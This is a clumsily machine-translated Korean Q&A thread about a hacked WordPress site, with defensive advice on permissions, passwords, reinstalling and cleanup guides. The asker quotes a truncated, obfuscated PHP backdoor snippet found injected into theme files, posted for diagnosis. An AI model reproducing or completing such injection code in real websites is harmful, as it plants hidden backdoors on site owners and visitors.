업데이트 된 Wordpress 사이트에서이 코드를 받았습니다.Wordpress 해킹 및 PHP 코드 추가
워드 프레스 3.3.1, 날짜까지 모든 플러그인.
플러그인 목록 : 맞춤 접촉 형태, 구글 -지도를 위해 워드 프레스 & 서구 궁극적. chmod를 644, 내가 chmod를 777이 처음으로 파일을 할 때마다, 그러나 그것은 단지 777 파일에 영향을주지 않습니다 영향을
일부 테마 파일, 또한 644 파일에 영향을 미친다.
그래서<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioD............okBoVSjr = $eva1tYlbakBcVSir;} ?>
, 나는이 문제를 방지 할 수있는 방법, 그리고 코드가 무엇을합니까 :
코드는 다음과 같다?
없음 워드 프레스 파일은 지금까지 777이어야한다; 최대 사용 권한은 755 개의 폴더, 644 개의 파일입니다. Hardening WordPress « WordPress Codex.
에게 호스팅 계정을 참조하십시오 - 공유 호스팅 아마도 저렴한 것은 - 아마 해킹 벡터이다. 호스트에게 알리십시오. 더 안전한 호스트를 찾을 수 있습니다. 모든 암호를 변경하십시오. 자신의 PC를 스캔하십시오.
가 완전히 WP 설치 및 호스팅 계정, FAQ: My site was hacked « WordPress Codex 및 How to completely clean your hacked wordpress installation 및 How to find a backdoor in a hacked WordPress.
안녕하세요, 고마워요. 그냥 WordPress와 모든 플러그인을 다시 설치해야합니다. 지금은 모두 안전해야합니다. 이상한 점은 해킹이 페이지의 상태를 200 옥에서 500 통으로 바꿀 뿐이며, 구글에서 실제로 상처를 입는다는 것입니다. 사이트는 사용자에게 잘로드되지만, 헤더 응답을 살펴보면 500이됩니다. 어쨌든, 이제는 모두 고쳐 졌을 것입니다. – user1068410
고마워요! 나는 WordPress 강화 기사를 따라 갔고, 또한 Wordpress 보안에 관한 추가 팁을 담고있는 블로그를 발견했다. http://dmlogic.com/blog/alternative-thoughts-on-securing-wordpress/ – user799188
음을 볼 청소하려면, 나는 그것이 백도어처럼 보이는 것을 몰랐다, 지금은 그것에 대해 구글에서 검색이 시작됩니다 같아요. - 감사 어떤 도움이나 코드가 – user1068410
@Niklas Baumstark appriciated되는 일이 무엇이를 방지하는 방법을 이해하는 - 당신이 말하는 "응용 프로그램"당신은 워드 프레스 파일을 의미합니까? – user1068410